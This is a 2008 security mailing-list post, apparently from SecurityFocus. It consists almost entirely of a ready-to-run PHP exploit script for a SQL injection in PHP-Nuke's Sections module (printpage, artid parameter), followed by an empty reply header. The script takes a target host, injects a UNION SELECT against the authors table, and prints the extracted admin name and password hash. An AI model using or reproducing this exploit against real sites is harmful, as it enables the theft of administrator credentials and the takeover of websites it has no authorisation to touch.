php-nuke 8.0 module sections artid blind sql inj vuln. Dec 30 2008 02:31PM
the dumenci gmail com (1 replies)
<?php

error_reporting (E_ERROR);

ini_set("max_execution_time",0);

echo '

+=========================================================+

|PHP-NUKE Module Sections printpage artid Sql inj Vuln.

|İMHATİMİ.ORG BugBUSTER Team. |

+=========================================================+

<+> version <8.0

<+> Tested on 7.9 & 6.0

';

if ($argc < 2){

print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";

print "ex.: " . $argv[0] . " phpnuke.org 7\n";

credits();

exit;

}

/* Acıklama */

if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.

else {$prefix = $argv[3];}

switch ($argv[2]){

case "6":

$query ="modules.php?name=Sections&op=printpage&artid=99999+union+select+aid,pw
d+from+".$prefix."_authors";

$version = 6;

break;

default:

$query ="modules.php?name=Sections&op=printpage&artid=99999'+union+select+aid,p
wd+from+".$prefix."_authors";

$version = 7;

break;

}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host

$http = $host . $query;

echo

'[+] host: '.$host . '

[+] nuke version: '.$version.'

';

#DEBUG

//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);

if ($matches[0]) {print "Hashs.: ".$matches[0];

if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}

else {echo "Basarısız(Exploit Failed)...";}

credits();

function credits(){

print "\n\n+========================================+\n\r Coded By dumenci \n\r Copyright (c) BugBUSTERs";

print "\n\r+========================================+\n";

exit;

}

?>

[ reply ]
Re: php-nuke 8.0 module sections artid blind sql inj vuln. Dec 30 2008 06:01PM
John Haywood (john code-authors com)


 

Privacy Statement
Copyright 2010, SecurityFocus